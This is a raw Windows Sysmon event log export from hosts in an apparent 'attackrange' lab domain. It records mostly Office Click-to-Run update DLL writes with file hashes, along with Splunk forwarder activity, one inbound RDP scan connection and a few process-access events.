AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AutoHelper.dllMD5=F24AAA777320789D143B7326B28EF69E,SHA256=64733C60F34B3DF78BCC5B8F05C7B9D54128B98AB340537EE60333DF05A3FF1F,IMPHASH=E582F29A346D0DAA517C438AC1CE118Etruetrue 23542300x800000000000000071545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exeMD5=C84F3E30978B44BCD9A0F98AFC2965F7,SHA256=CB4BB1278C376AA35FEDEE154AF924B46DCF95666113CFDB3D442FB08BF631C8,IMPHASH=42AC806718EAC0E5CF64E19C5ADE0FE1truetrue 23542300x800000000000000071544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingChromeHook.dllMD5=984FF2B69913C43C69FC8495FA454610,SHA256=2F80CF328BC77FB3EAD096A9C1D1BCD16842479B5B2839F8665E37F0720A7D7C,IMPHASH=E7C4A751C9AFBB1794019154B9A84825truetrue 23542300x800000000000000071543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-utility-l1-1-0.dllMD5=D6ABF5C056D80592F8E2439E195D61AC,SHA256=8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-time-l1-1-0.dllMD5=1FA7C2B81CDFD7ACE42A2A9A0781C946,SHA256=CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dllMD5=5E72659B38A2977984BBC23ED274F007,SHA256=44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-stdio-l1-1-0.dllMD5=32D7B95B1BCE23DB9FBD0578053BA87F,SHA256=104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-runtime-l1-1-0.dllMD5=AE3FA6BF777B0429B825FB6B028F8A48,SHA256=66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-process-l1-1-0.dllMD5=8F8A47617DFD829A63E3EC4AFF2718D9,SHA256=6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-private-l1-1-0.dllMD5=1DD5666125B8734E92B1041139FA6C37,SHA256=D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-multibyte-l1-1-0.dllMD5=809BC1010EAF714CD095189AF236CE2F,SHA256=B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-math-l1-1-0.dllMD5=D0D380AF839124368A96D6AA82C7C8AE,SHA256=06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-locale-l1-1-0.dllMD5=E70D8FE9D21841202B4FD1CF55D37AC5,SHA256=E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-heap-l1-1-0.dllMD5=39D81596A7308E978D67AD6FDCCDD331,SHA256=3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dllMD5=AB8734C2328A46E7E9583BEFEB7085A2,SHA256=921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-environment-l1-1-0.dllMD5=45C54A21261180410091CEFB23F6A5AE,SHA256=2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-convert-l1-1-0.dllMD5=5245F303E96166B8E625DD0A97E2D66A,SHA256=90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-conio-l1-1-0.dllMD5=3B038338C1EB179D8EEE3883CF42BC3E,SHA256=C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-xstate-l2-1-0.dllMD5=E20C50CB320A5718AE869D8EC4D460CA,SHA256=48C776F38EAED72CB05A993484F60CBFDF5AF59AEBC48E53481A997AE7DED8DC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dllMD5=A20084F41B3F1C549D6625C790B72268,SHA256=0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-synch-l1-2-0.dllMD5=F6B4D8D403D22EB87A60BF6E4A3E7041,SHA256=25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-processthreads-l1-1-1.dllMD5=C2EAD5FCCE95A04D31810768A3D44D57,SHA256=42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-localization-l1-2-0.dllMD5=3B9D034CA8A0345BC8F248927A86BF22,SHA256=A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l2-1-0.dllMD5=BFB08FB09E8D68673F2F0213C59E2B97,SHA256=6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l1-2-0.dllMD5=F6D1216E974FB76585FD350EBDC30648,SHA256=348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.XlsIO.Base.dllMD5=DBEF8DD7EFC6DA29D3826851CD60642C,SHA256=5CB7AD4134572D199F9CAE22B079A43B828BFF9FD685004FEF4405A906F5DAAE,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.141{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Tools.Windows.dllMD5=B1FAC679B47FAE77F0A1B1C97D7BC9E8,SHA256=08704125D977AF9FD036F0157FDE1AE8BC4C2722A907CD34575D1618E88F0420,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.110{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72271EC0753FCA3D35B600F61B293150,SHA256=29BD68615A5E9640B87987A1E155E4355B45F832F8A03B9358D8329C51B92735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.094{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Tools.Base.dllMD5=611D05ABE991D60538321BAC1EDCB45E,SHA256=EDB2B2057E0F2D5600CFEBAD62BD41FA1D519B51986D05AC7EFA21816A15A0CD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.094{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Shared.Windows.dllMD5=9E25194405021B071AA4250911B9AC24,SHA256=39317551B4EB490E1E681B35ACF53F1BCD2B9F1E5E4EDC4C7C421017A12F4BCF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Shared.Base.dllMD5=3EBF9820B29215651E83C846479111A3,SHA256=32D3DD749437B12FFF4DA38382B94F31C05782A8485FF724C3D39B3FB88F85E3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grouping.Base.dllMD5=E6BBB33583A7D5DABF7858C8BB7F5E77,SHA256=692F8C61A730ADABD1D9E6CB38361CDF4EC21AA9AB7B910818C62517FB07DFEB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000071514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.505{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52453-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000071513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Windows.dllMD5=DFC2486C5EE6A044CA3C0FECA08568BF,SHA256=A25E8A1BA998ACBC033EC26621DD494D416C9F1900415C52059DABBB9D3E199A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Grouping.Windows.dllMD5=3B8CD57CE2EE8472B38156A2FDBAF836,SHA256=92E700EB15E1F963A8C3AB2B62C7850509FBE2D460D1F3181F9DFC30F555D68C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Grouping.Base.dllMD5=937AA3E1A58327D7DE1351BD9FB33260,SHA256=C53B8AA5964C18B7F7DF9A1586C635DC956068809D3F6E39DB82BF67383A4A30,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Base.dllMD5=DCB7732D9CE4B9DA01F87E52FCA832E0,SHA256=5EBE7FB7A4480748C6D443B591D354318BB63D8AE4884828DB8A2F3FE963A772,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Core.dllMD5=DBD87246BE14DAB47FCD1D9582D0E908,SHA256=FE0B619FE610062366FA85320A931E4893F8AB29A7DF50C462AB04998A482383,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Compression.Base.dllMD5=ECB6BF4E7AAA463013189C69BE114040,SHA256=CDA22A92DA1FA1EBCB3D782DDBCA9A3326458757645A2E7E8A9DF7B2104D036E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000049832Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:53.684{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6FB542671E0E22242FA4CE1C33DADC0D,SHA256=3EBB0910C52D4C5A25E29B638A6B61510E1E8950C18CF81B84BFCEF94733FE9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049831Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:53.309{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B17E066C4F0D6AA6ED10BC539421771,SHA256=4F1297645BA8A755A29602DD41077377B04577A485FFB4145A757F79AEDF7B28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000071691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.985{A7A01FEF-EB7A-607E-7F0B-00000000BB01}35403532C:\Windows\system32\conhost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.985{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7A-607E-7F0B-00000000BB01}3540C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 